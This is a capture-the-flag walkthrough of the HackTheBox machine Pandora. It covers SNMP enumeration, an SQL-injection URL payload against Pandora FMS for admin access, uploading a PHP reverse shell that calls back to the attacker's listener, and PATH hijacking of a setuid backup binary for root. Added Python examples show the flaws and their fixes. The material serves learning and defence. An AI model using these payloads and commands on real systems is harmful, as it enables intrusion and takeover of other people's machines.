Pandora from HackTheBox — Detailed Walkthrough

Showing you all the tools and techniques needed to complete the box.

Pencer
InfoSec Write-ups


Machine Information

Pandora from HackTheBox

Pandora is an easy machine on HackTheBox. An initial website on port 80 reveals nothing, but enumeration of UDP ports exposes credentials for SSH. We find a binary that points us to a website running locally on the box, which we access via port tunnelling. We gain admin access to Pandora FMS on the box via an exploit. From there we upload a reverse shell to gain access as a low level user. Enumeration finds another binary; this one calls tar by an unqualified (not absolute) path when it backs up the Pandora site. We use this to get a root shell to complete the box.

Skills required are basic web and OS enumeration. Skills learned are using public exploits and tunnelling traffic to access remote sites.

Initial Recon

As always let’s start with Nmap:

Nmap scan of the box

Just a website on port 80 to look at to start with:

Play website on Pandora

Looking around we find it’s a simple HTML site with nothing of interest. Next I did a quick scan of UDP ports:

┌──(root💀kali)-[~/htb/pandora]
└─# nmap -sU --top-ports=20 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 21:32 GMT
Nmap scan report for 10.10.11.136
Host is up (0.025s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 8.40 seconds

SNMP

Port 161 which is SNMP is open, let’s have a closer look at that:

┌──(root💀kali)-[~]
└─# nmap -sC -sV -sU -p161 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 21:26 GMT
Nmap scan report for 10.10.11.136
Host is up (0.021s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-win32-software:
| accountsservice_0.6.55-0ubuntu12~20.04.5_amd64; 2021-12-07T12:57:21
| adduser_3.118ubuntu2_all; 2021-02-01T17:21:32
| alsa-topology-conf_1.2.2-1_all; 2021-02-01T17:25:18
| alsa-ucm-conf_1.2.2-1ubuntu0.11_all; 2021-12-07T12:57:25
| amd64-microcode_3.20191218.1ubuntu1_amd64; 2021-06-11T12:44:07
| apache2-bin_2.4.41-4ubuntu3.8_amd64; 2021-12-07T12:57:07
| apache2-data_2.4.41-4ubuntu3.8_all; 2021-12-07T12:57:07
| apache2-utils_2.4.41-4ubuntu3.8_amd64; 2021-12-07T12:57:07
<SNIP>
| 837:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 838:
| Name: sh
| Path: /bin/sh
| Params: -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p <HIDDEN>'
<SNIP>

There was a long list returned, but we see something interesting: a username and password have been leaked in a process command line.
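Credentials passed as process arguments are readable by every local user through /proc and, as here, by anyone who can read the SNMP community string. The following is an added example (not from the original write-up) that parses hrSWRun-style output like the dump above and flags arguments that look like secrets; the sample processes and values are constructed.

```python
import re

# Constructed sample shaped like nmap's hrSWRun (snmp-processes) output,
# one Name/Path/Params triple per process; not the box's real dump.
SAMPLE_HRSWRUN = """\
837:
  Name: cron
  Path: /usr/sbin/CRON
  Params: -f
838:
  Name: sh
  Path: /bin/sh
  Params: -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p EXAMPLE-NOT-REAL'
839:
  Name: mysqld
  Path: /usr/sbin/mysqld
  Params: --user=mysql --password=example-not-real
"""

# Argument shapes that usually carry a secret: "-p VALUE", "--password=VALUE",
# "pass VALUE", "--token=VALUE" and similar.
SECRET_ARG = re.compile(
    r"(?:(?:^|(?<=\s))-p\s+\S+|--?(?:pass(?:word|wd)?|secret|token)(?:=|\s+)\S+)",
    re.IGNORECASE,
)

def parse_hrswrun(text):
    """Turn hrSWRun-style text into dicts with pid, name, path and params."""
    procs, cur = [], None
    for line in text.splitlines():
        m = re.match(r"\s*(\d+):\s*$", line)
        if m:
            cur = {"pid": int(m.group(1)), "name": "", "path": "", "params": ""}
            procs.append(cur)
            continue
        m = re.match(r"\s*(Name|Path|Params):\s*(.*)$", line)
        if m and cur is not None:
            cur[m.group(1).lower()] = m.group(2).strip()
    return procs

def find_leaked_secrets(text):
    """Return (pid, path, argument) for every process whose command line carries a
    credential-looking argument. Anything listed here is exposed to every local
    user via /proc and to anyone who can query SNMP hrSWRunParameters."""
    hits = []
    for p in parse_hrswrun(text):
        for m in SECRET_ARG.finditer(p["params"]):
            hits.append((p["pid"], p["path"], m.group(0)))
    return hits
```

The same scan works on `ps -eo pid,args` output with a small change to the parser; the remediation is the same either way, read the secret from a file or environment the process owns rather than from argv.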

SSH Access As Daniel

Trying these credentials on the SSH port we saw open works:

┌──(root💀kali)-[~]
└─# ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
System information as of Wed 19 Jan 21:34:26 UTC 2022
daniel@pandora:~$

We’re in, and a quick look at the passwd file shows there’s another user called matt:

Grep of passwd for users

The user flag is owned by Matt so we can’t get that yet:

daniel@pandora:~$ ls -ls /home/matt/
4 -rw-r----- 1 root matt 33 Jan 19 17:08 user.txt

Looking at running processes shows the same long list we saw before:

List of processes running on the box

Suspicious Binary

The file host_check is being run with the credentials we used to get in, so let’s have a look at it:

daniel@pandora:~$ cat /usr/bin/host_check
ELF>�@:@8
H�=��(�����ÐAWL�=�+AVI��AUI��ATA��UH�-�+SL)�H������H��t�L��L��D��A��H��H9�u�H�[]A\A]A^A_��H�H��
PandoraFMS host check utilityNow attempting to check PandoraFMS registered hosts.Files will be saved to ~/.host_check/usr/bin/curl
'http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass='
> ~/.host_check 2>/dev/nullHost check unsuccessful!
Please check your credentials.
Terminating program!Host check successful!
Terminating program!Ussage: ./host_check -u username -p password.Two arguments expected.����X����h���XM���������X���0zRx

It’s a binary file, so the output from cat is messed up, but we can see curl in there with a URL. We can try that on the box:

Curl the internal website

Port Forwarding

Ok, I have no idea what it’s doing! However there is something running on the loopback IP with what looks like a subfolder called pandora_console. We can use port forwarding like we have many times in the past, most recently on Static:

┌──(root💀kali)-[~]
└─# ssh -L 8000:127.0.0.1:80 daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
System information as of Wed 19 Jan 21:52:09 UTC 2022
Last login: Wed Jan 19 21:34:27 2022 from 10.10.14.10
daniel@pandora:~$

Above we log in to an SSH session on the box with Daniel’s credentials, but this time we forward any traffic sent to port 8000 on Kali through the SSH tunnel to port 80 on the box. Now we can use a web browser on Kali to reach the website we found on the box:

Pandora console accessed via port forwarding

Pandora Console

Now we can access that console and we see something called Pandora FMS. Clicking on the docs link top left takes us here. Also at the bottom of this landing page we see the version on the box is revealed as v7.0NG.742_FIX_PERL2020.

After a quick search I found this blog that shows a vulnerability in that version on Pandora. Looking up the CVE in there we find this GitHub repo with a proof of concept to try.

It’s simple enough: we just paste this into our browser on Kali whilst we have our tunnel forwarding to the box:

http://127.0.0.1:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
Exploit pasted in to web browser on Kali

In a new tab open the pandora_console again and now we have access as admin:

Pandora FMS console as admin
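The injected session_id above reaches the database inside a string-built query, so the UNION appends a row whose data column names admin and the console treats it as a logged-in session. As an added example that is not Pandora FMS code, the sqlite3 model below (a constructed table named after tsessions_php, with assumed column names) shows that flawed lookup beside a parameterised one, which returns no row for the same payload.

```python
import re
import sqlite3
from urllib.parse import unquote

# session_id value exactly as it appears in the URL from the write-up, URL-decoded.
PAYLOAD = unquote("a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27"
                  "%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271")

def make_db():
    """Constructed stand-in for the console's session table: the column names
    are assumed, not Pandora's real schema. One valid session belongs to daniel."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tsessions_php (id_session TEXT PRIMARY KEY, "
                "last_active INTEGER, data TEXT)")
    con.execute("INSERT INTO tsessions_php VALUES ('sess-daniel-example', 1642600000, "
                "'id_usuario|s:6:\"daniel\";')")
    return con

def lookup_session_vulnerable(con, session_id):
    """The flawed pattern: the request value is spliced into the SQL text, so a
    quote ends the literal and the rest of the value becomes SQL."""
    sql = ("SELECT id_session, last_active, data FROM tsessions_php "
           "WHERE id_session = '%s'" % session_id)
    return con.execute(sql).fetchone()

def lookup_session_safe(con, session_id):
    """The fix: bind session_id as a parameter; it is compared as data only."""
    sql = "SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = ?"
    return con.execute(sql, (session_id,)).fetchone()

SESSION_USER = re.compile(r'id_usuario\|s:(\d+):"([^"]*)";')

def user_from_session_data(data):
    """Pull the user name out of PHP-serialised 'id_usuario|s:N:"name";' data,
    checking the declared length the way PHP's unserialize would."""
    m = SESSION_USER.search(data or "")
    if not m or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2)

def demo():
    """Returns (user the vulnerable lookup believes in, row the safe lookup returns)."""
    con = make_db()
    row = lookup_session_vulnerable(con, PAYLOAD)
    return user_from_session_data(row[2] if row else None), lookup_session_safe(con, PAYLOAD)
```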

There’s a lot to look around but eventually I found this File Manager section:

File manager

Which takes me to a list of files. Clicking the top right icon brings up this Upload Files box:

Upload files box

Reverse Shell

Time for a reverse shell. Let’s use one of the PHP shells already included on Kali:

┌──(root💀kali)-[~/htb/pandora]
└─# cp /usr/share/laudanum/php/php-reverse-shell.php .

┌──(root💀kali)-[~/htb/pandora]
└─# cat php-reverse-shell.php | grep '$ip'
$ip = '10.10.14.10'; // CHANGE THIS

All I’ve done is change the IP to my current tun0. Switch back to the webpage and upload the file:

File manager successfully uploaded file

That works and scrolling down the long list of files we can find ours:

Find file we uploaded

Hovering over the files we can see a path in the URLs:

http://127.0.0.1:8000/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager&directory=images/backgrounds&hash2=764b0acce6acdb3e5ca2a6ebb646ec29

In the URL you can see directory=images/backgrounds; that is the path our file was uploaded to. Start nc listening in another terminal on Kali, then browse to the shell we uploaded:

Enter path to our file in browser

Back to the terminal to see we’re connected:

┌──(root💀kali)-[~/htb/pandora]
└─# nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.136] 55864
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
$

First thing, let’s upgrade our shell:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/$ ^Z
zsh: suspended nc -nlvp 8888
┌──(root💀kali)-[~/htb/pandora]
└─# stty raw -echo; fg
[1] + continued nc -nlvp 8888
matt@pandora:/$ export TERM=xterm
matt@pandora:/$ stty rows 51 cols 236

User Flag

That’s better. Now we can see we’re in as Matt, let’s grab the user flag:

matt@pandora:/$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)

matt@pandora:/$ cat /home/matt/user.txt
6de8401da164b118c4bbad8549bde0d1

Pandora Backup

A look around found an interesting file:

matt@pandora:/$ find / -perm -4000 2>/dev/null
<SNIP>
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
<SNIP>

What is pandora_backup?

matt@pandora:/$ ls -lsa /usr/bin/pandora_backup 
20 -rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backup

Not sure, let’s see what it does:

matt@pandora:/$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!

It doesn’t seem to work. Looking inside it with cat reveals it’s another binary, and we can see it uses tar to back up the Pandora installation to a folder under /root:

matt@pandora:/$ cat /usr/bin/pandora_backup
ELF>�@0:@8
@@@@h���HHmm HH�-�=�=hp�-�=�=����DDP�td� � � <<Q�tdR�td�-�=�=▒▒/lib64/ld-linux-x86-64.so.2GNUqtðG7�%H9�
<SNIP>
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*Backup failed!
Check your permissions!Backup successful!Terminating program!<(�������������X}�������h���8zRx

SSH Access As Matt

After a fruitless play around I eventually decided to drop out of this reverse shell and use a proper SSH session. First create a new key pair on Kali:

┌──(root💀kali)-[~/htb/pandora]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/htb/pandora/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/htb/pandora/id_rsa
Your public key has been saved in /root/htb/pandora/id_rsa.pub
The key fingerprint is:
SHA256:sJrMlhq6+lBuOaxgeVcKujv75rGInYGSf1A2GHa2fXY root@kali
The key's randomart image is:
+---[RSA 3072]----+
| |
| o o |
| . = o. |
| . = .oo E |
| .+ ..+S. |
| *++.+o |
|*+O+Bo |
|=O+O= |
|BB&= |
+----[SHA256]-----+

Don’t forget to change permissions:

┌──(root💀kali)-[~/htb/pandora]
└─# chmod 600 id_rsa

Copy the public key to the clipboard:

┌──(root💀kali)-[~/htb/pandora]
└─# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDoUK0S9FLwAzcvY5zWa70acZ/CWevVuxj3zIfjhFjZnklGvsCpFxTK124kVy8htLciaaP25f+14g2cD65Ao5DOJQclwI7h8oEXk879NvwDhBnqTt6S+OXn44XPIFvt9cdpaaxDDMZkRrh0mHtC9XVnTk0d/Sq61afh5/k9MozSJpvX55et2p/+Hj7Mk77q/zK2/Nt4MFtNogwlVd9ArQgOiyljKpG1Byjb/IYOssbdhgV1rgqoSVInXgWUeoXZmSpkmzK/W5wQ6sCkRBBmnHe8aLsZr++5YDZM9M8yuO1HxMK0KhSl5xrjvwBp7f8+PLt9DR+vmgiHxz5JUIPu1lOFrBxjozM5oXA4WBvmDFzJH+B4Ti0PJNA2qMCXO8SNFk06+tkkxHZ4tBRhpTpaESKafeFzlIamGIA9xKlL9bxfPhHKwAHVEo8Emopj4foaf8ho3Cy7u5/69s0p1DWZ1bAED367C0QbF5GmvsI/9Zny03badPLt17O558foH9+RfOE= root@kali

Back on the box make the .ssh folder in Matt’s home directory:

matt@pandora:/home/matt$ mkdir .ssh

Now paste that public key from Kali on to the box and save to authorized_keys:

matt@pandora:/home/matt$ echo "ssh-rsa <SNIP> root@kali" > .ssh/authorized_keys

Don’t forget to change permissions:

matt@pandora:/home/matt$ chmod -R 600 .ssh/

Now we can log in via SSH as Matt using our keys:

┌──(root💀kali)-[~/htb/pandora]
└─# ssh -i id_rsa matt@10.10.11.136
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
System information as of Wed 19 Jan 22:51:24 UTC 2022
matt@pandora:~$

This time when we run the backup it works:

matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: Removing leading `/' from member names
/var/www/pandora/pandora_console/AUTHORS
tar: Removing leading `/' from hard link targets
/var/www/pandora/pandora_console/COPYING
/var/www/pandora/pandora_console/DB_Dockerfile
/var/www/pandora/pandora_console/DEBIAN/
/var/www/pandora/pandora_console/DEBIAN/md5sums
/var/www/pandora/pandora_console/DEBIAN/conffiles
/var/www/pandora/pandora_console/DEBIAN/control
<SNIP>
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/Validation/MultipleErrors.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/Validation/EmailValidation.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/Validation/DNSCheckValidation.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/EmailParser.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/EmailValidator.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/README.md
/var/www/pandora/pandora_console/vendor/egulias/email-validator/composer.json
/var/www/pandora/pandora_console/vendor/egulias/email-validator/phpunit.xml.dist
/var/www/pandora/pandora_console/vendor/egulias/email-validator/LICENSE
/var/www/pandora/pandora_console/ws.php
Backup successful!
Terminating program!

Privilege Escalation

Now we can take advantage of the fact that the backup program calls tar by name rather than by its absolute path, as we saw when looking inside it.

Just create our own file called tar which calls bash and make it executable:

matt@pandora:~$ echo '/bin/bash;' > tar
matt@pandora:~$ chmod +x tar

Add this folder to $PATH at the start so our version of tar is used instead of the correct one:

matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ $PATH
-bash: /home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin: No such file or directory

With /home/matt at the start of the path the backup program will use tar in there instead. Run the backup again:

matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~#
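Added example, not the box's code: a model of how execvp(3) resolves a bare command name through PATH, with an audit helper that reports which commands a user-writable PATH entry would shadow, and the two fixes a setuid program should use (an absolute path to tar, or a PATH it pins itself instead of inheriting from the caller). The filesystem contents are constructed.

```python
import os

# PATH a privileged program should set for itself instead of trusting the caller's.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

def resolve_like_execvp(command, path, is_executable):
    """Model of execvp(3): a name containing '/' is used as given; otherwise the
    first PATH entry that holds an executable of that name wins. is_executable is
    a predicate so the lookup can run against a constructed filesystem."""
    if "/" in command:
        return command if is_executable(command) else None
    for d in path.split(":"):
        candidate = os.path.join(d or ".", command)
        if is_executable(candidate):
            return candidate
    return None

def shadowed_commands(path, system_commands, user_writable_dirs, is_executable):
    """Audit helper: for each command name, report the user-writable PATH entry that
    is searched before the real binary, where a planted file would be picked up."""
    findings = {}
    for cmd in system_commands:
        for d in path.split(":"):
            if d in user_writable_dirs:
                findings[cmd] = d
                break
            if is_executable(os.path.join(d, cmd)):
                break  # real binary found first; this command is safe
    return findings

def demo():
    """Constructed filesystem: the real tar plus a planted /home/matt/tar.
    Returns what 'tar' resolves to with the hijacked PATH, with the pinned
    PATH, and when the program uses an absolute path regardless of PATH."""
    fs = {"/usr/bin/tar", "/home/matt/tar"}
    hijacked_path = "/home/matt:" + SAFE_PATH
    return (
        resolve_like_execvp("tar", hijacked_path, fs.__contains__),
        resolve_like_execvp("tar", SAFE_PATH, fs.__contains__),
        resolve_like_execvp("/usr/bin/tar", hijacked_path, fs.__contains__),
    )
```

Running the audit over a real host means passing `os.access(d, os.W_OK)` results as user_writable_dirs and `lambda p: os.access(p, os.X_OK)` as is_executable.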

Root Flag

It stops before doing anything and we are at a root prompt. Let’s grab the flag:

root@pandora:~# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:~# cat /root/root.txt
4bfc0ffaf379e65d41adb3f0f3b9144a

All done. Hope you enjoyed this box, see you next time.

If you liked this article please leave me a clap or two (it’s free!)

Twitter — https://twitter.com/pencer_io
Website — https://pencer.io

Originally published at https://pencer.io on May 24, 2022.
